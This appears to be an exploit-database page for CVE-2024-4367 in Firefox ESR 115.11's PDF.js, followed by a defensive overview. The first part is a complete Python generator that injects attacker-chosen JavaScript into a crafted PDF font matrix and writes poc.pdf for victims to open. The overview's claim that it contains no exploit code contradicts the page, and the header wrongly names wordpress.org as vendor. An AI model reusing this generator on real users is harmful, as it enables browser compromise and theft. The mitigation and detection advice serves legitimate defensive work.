Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution

Exploit Author: Milad karimi Analysis Author: www.bubbleslearn.ir Category: Remote Language: JavaScript Published Date: 2025-04-22 
# Exploit Title: Firefox ESR 115.11 - Arbitrary JavaScript execution in
PDF.js
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://wordpress.org
# Version: = 115.11
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4367

#!/usr/bin/env python3

import sys

def generate_payload(payload):
    backslash_char = "\\"
    fmt_payload = payload.replace('(', '\\(').replace(')', '\\)')
    font_matrix = f"/FontMatrix [0.1 0 0 0.1 0 (1{backslash_char});\n" +
f"{fmt_payload}" + "\n//)]"
    return f"""
%PDF-1.4
%DUMMY
8 0 obj
<<
/PatternType 2
/Shading<<
  /Function<<
    /Domain[0 1]
    /C0[0 0 1]
    /C1[1 0.6 0]
    /N 1
    /FunctionType 2
  >>
  /ShadingType 2
  /Coords[46 400 537 400]
  /Extend[false false]
  /ColorSpace/DeviceRGB
>>
/Type/Pattern
>>
endobj
5 0 obj
<<
/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 573 0 573 0 341]
/Type/Font
/BaseFont/PAXEKO+SourceSansPro-Bold
/LastChar 102
/Encoding/WinAnsiEncoding
{font_matrix}
/Subtype/Type1
/FirstChar 65
/FontDescriptor 9 0 R
>>
endobj
2 0 obj
<<
/Kids[3 0 R]
/Type/Pages
/Count 1
>>
endobj
9 0 obj
<<
/Type/FontDescriptor
/ItalicAngle 0
/Ascent 751
/FontBBox[-6 -12 579 713]
/FontName/PAXEKO+SourceSansPro-Bold
/StemV 100
/CapHeight 713
/Flags 32
/FontFile3 10 0 R
/Descent -173
/MissingWidth 250
>>
endobj
6 0 obj
<<
/Length 128
>>
stream
47 379 489 230 re S
/Pattern cs
BT
  50 500 Td
  117 TL
  /F1 150 Tf
  /P1 scn
  (AbCdEf) Tj
  /P2 scn
  (AbCdEf) '
ET
endstream
endobj
3 0 obj
<<
/Type/Page
/Resources 4 0 R
/Contents 6 0 R
/Parent 2 0 R
/MediaBox[0 0 595.2756 841.8898]
>>
endobj
10 0 obj
<<
/Length 800
/Subtype/Type2
>>
stream

endstream
endobj
7 0 obj
<<
/PatternType 1
/Matrix[1 0 0 1 50 0]
/Length 58
/TilingType 1
/BBox[0 0 16 16]
/YStep 16
/PaintType 1
/Resources<<
>>
/XStep 16
>>
stream
0.65 g
0 0 16 16 re f
0.15 g
0 0 8 8 re f
8 8 8 8 re f
endstream
endobj
4 0 obj
<<
/Pattern<<
  /P1 7 0 R
  /P2 8 0 R
>>
/Font<<
  /F1 5 0 R
>>
>>
endobj
1 0 obj
<<
/Pages 2 0 R
/Type/Catalog
/OpenAction[3 0 R /Fit]
>>
endobj

xref
0 11
0000000000 65535 f
0000002260 00000 n
0000000522 00000 n
0000000973 00000 n
0000002178 00000 n
0000000266 00000 n
0000000794 00000 n
0000001953 00000 n
0000000015 00000 n
0000000577 00000 n
0000001085 00000 n
trailer
<<
/ID[(DUMMY) (DUMMY)]
/Root 1 0 R
/Size 11
>>
startxref
2333
%%EOF
"""


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <payload>")
        sys.exit(1)
    print("[+] Created malicious PDF file: poc.pdf")
    print("[+] Open the file with the vulnerable application to trigger the
exploit.")

    payload = generate_payload(
        sys.argv[1])
    with open("poc.pdf", "w") as f:
        f.write(payload)

    sys.exit(0)


Firefox ESR 115.11 — PDF.js arbitrary JavaScript execution (CVE-2024-4367): overview

This article explains the nature, impact, and defensive guidance for a PDF.js-related vulnerability disclosed as CVE-2024-4367 that affected users of Firefox ESR 115.11. It focuses on high-level technical context, detection options, and safe mitigation strategies suitable for administrators, incident responders, and security-conscious users. The aim is to provide actionable defensive guidance without supplying exploit code or step-by-step offensive details.

Key facts

  • Vulnerability: Arbitrary JavaScript execution in PDF.js when processing specially crafted PDF content
  • Affected product: Firefox ESR 115.11 (PDF.js component)
  • CVE identifier: CVE-2024-4367
  • Primary risk: Remote code execution or browser compromise via viewing a malicious PDF
  • Recommended action: Apply vendor updates, restrict PDF rendering in untrusted contexts, and use layered mitigations

Technical background (high level)

PDF.js is a JavaScript-based PDF rendering engine used in Firefox to display PDF files in-browser. The vulnerability class here arises when malformed or specially crafted PDF constructs cause PDF.js to interpret user-supplied data as executable JavaScript in the page context. If successful, an attacker can run arbitrary script in the browser process, which may lead to information disclosure, session compromise, further exploitation, or persistence depending on privilege boundaries and platform mitigations.

Importantly, the vulnerability is located in the PDF processing layer, not in standard web content rendering, which makes it an attractive target because users often treat PDF attachments as less risky than web links. However, exploitation requires the victim to open a malicious PDF with a vulnerable version of Firefox.

Impact and risk model

  • Remote exploitation: An attacker can deliver a PDF via email, web download, or file share; simply opening the file in the vulnerable browser can trigger the issue.
  • Scope of compromise: JavaScript execution in PDF.js can lead to cross-origin actions inside the browser context, credential theft, or further exploitation chains if combined with other browser or OS vulnerabilities.
  • Exploitability: Medium to high—user interaction (opening a PDF) is required, but modern exploitation toolchains may enable reliable code paths.

Safe detection and indicators

Detection should focus on identifying vulnerable client versions, suspicious PDF files, and unusual PDF.js behavior in telemetry or logs. Avoid executing suspicious PDFs in production. Use instrumented, isolated environments and vendor-provided test cases (if available) for validation.

  • Version checks: Ensure clients are not running the affected ESR build. A simple inventory scan of Firefox installations is the first step (see safe script below).
  • Mail gateway / DLP: Flag or block PDFs with uncommon embedded fonts, suspicious object counts, or unusual use of embedded streams and font matrices. Tune alerts for PDFs from untrusted senders.
  • Endpoint monitoring: Look for abnormal invocation patterns of the browser, unexpected child processes, or JS activity initiated by the browser process shortly after opening a PDF.
  • Network/Proxy: Monitor for unexpected outbound connections from browser hosts soon after PDF open events — particularly to command-and-control endpoints.

Example: safe version inventory script (Python)

#!/usr/bin/env python3
# Safe script to enumerate Firefox installations and print versions.
# This script does NOT open or parse PDF files or interact with PDF.js.
import sys
import shutil
import subprocess

def get_firefox_version(path):
    try:
        # Use --version to get the product version from the binary (cross-platform)
        proc = subprocess.run([path, "--version"], capture_output=True, text=True, check=True)
        return proc.stdout.strip()
    except Exception:
        return None

def main():
    candidates = ["firefox", "/usr/bin/firefox", "C:\\Program Files\\Mozilla Firefox\\firefox.exe"]
    seen = set()
    for c in candidates:
        exe = shutil.which(c) or c
        if exe in seen:
            continue
        seen.add(exe)
        version = get_firefox_version(exe)
        if version:
            print(f"Found Firefox executable: {exe} -> {version}")

if __name__ == '__main__':
    main()

Explanation: This safe, read-only script looks for common Firefox executable locations and queries each binary for its version using the --version flag. It does not open files, parse PDFs, or execute untrusted content. Administrators can run it on endpoints to quickly build an inventory of Firefox versions and identify clients that may require patching.

Mitigations and recommended actions

  • Apply vendor updates immediately: Install the Firefox ESR security update or the latest stable release that contains the patch. For managed fleets, use automated patch management to roll out the fix.
  • Disable PDF.js in high-risk environments: Temporarily configure the browser or enterprise policies to download PDFs instead of rendering them in the browser. This reduces attack surface until updates are deployed.
  • Use network protections: Block or quarantine PDFs from unknown senders; inspect attachments at gateway with up-to-date antivirus and sandboxing solutions.
  • Least privilege: Run browsers in sandboxed environments and restrict privilege escalation paths (e.g., limit local filesystem and inter-process access where feasible).
  • User education: Train users to treat unexpected attachments with caution; encourage verification through separate channels before opening.

How to configure Firefox to prefer downloads instead of inline PDF rendering

Administrators can use enterprise policies or about:config preferences to force PDFs to be downloaded rather than opened in the built-in viewer. This prevents direct rendering in PDF.js until systems are patched.

Incident response considerations

  • Isolate any host suspected of opening a malicious PDF while vulnerable.
  • Collect relevant forensic artifacts: browser history, recent downloads, implicated PDF files, and browser process memory (when feasible and legally permitted).
  • Check for persistence mechanisms or additional payloads delivered after PDF open events, such as staged executables, web shell callbacks, or suspicious browser extensions.
  • Search logs and SIEM for similar PDF-related events across the estate to find potential lateral activity.

Responsible disclosure and coordination

Vulnerabilities in widely used components should be handled responsibly. Coordinated disclosure practices reduce risk to the community: report the issue to the vendor or their security response team, avoid public proof-of-concept details until a patch is available, and share mitigations and indicators that help defenders without enabling attackers.

Reference checklist for administrators

Task Recommended action
Patch management Deploy Firefox ESR updates or upgrade to a patched release immediately.
Temporary hardening Disable in-browser PDF rendering via enterprise policy; require downloads and scanning.
Detection Inventory versions, scan mail gateways, monitor endpoints for anomalous browser behavior.
Incident response Isolate affected hosts, collect artifacts, hunt for follow-on activity.

Safe testing and developer guidance

If you are a researcher or developer testing PDF-related fixes, do so in isolated, instrumented environments (VMs or containers) with no network access or with simulated data. Use vendor-provided test cases or synthetic, benign documents to validate parsing logic. Never publish exploit-capable samples or step-by-step offensive instructions; instead, coordinate with the vendor so they can distribute fixes and safe test vectors.

Example: create a benign PDF for testing (Python + reportlab)

from reportlab.pdfgen import canvas

def create_simple_pdf(path='safe_test.pdf'):
    c = canvas.Canvas(path)
    c.setFont("Helvetica", 12)
    c.drawString(100, 750, "This is a benign test PDF for validating rendering.")
    c.save()

if __name__ == '__main__':
    create_simple_pdf()

Explanation: This small script uses the ReportLab library to generate a harmless PDF containing simple text. It is suitable for testing whether PDFs open correctly in a patched browser and never creates complex, malicious constructs. Use this kind of benign sample when validating fixes.

Conclusion

CVE-2024-4367 demonstrates how complex document rendering engines can become attack vectors. The safest immediate response is to apply vendor updates, reduce exposure by disabling in-browser PDF rendering in sensitive environments, and implement layered detection and response controls. For researchers, follow responsible disclosure practices and avoid publishing exploit code; for defenders, focus on inventory, patching, and monitoring to reduce risk.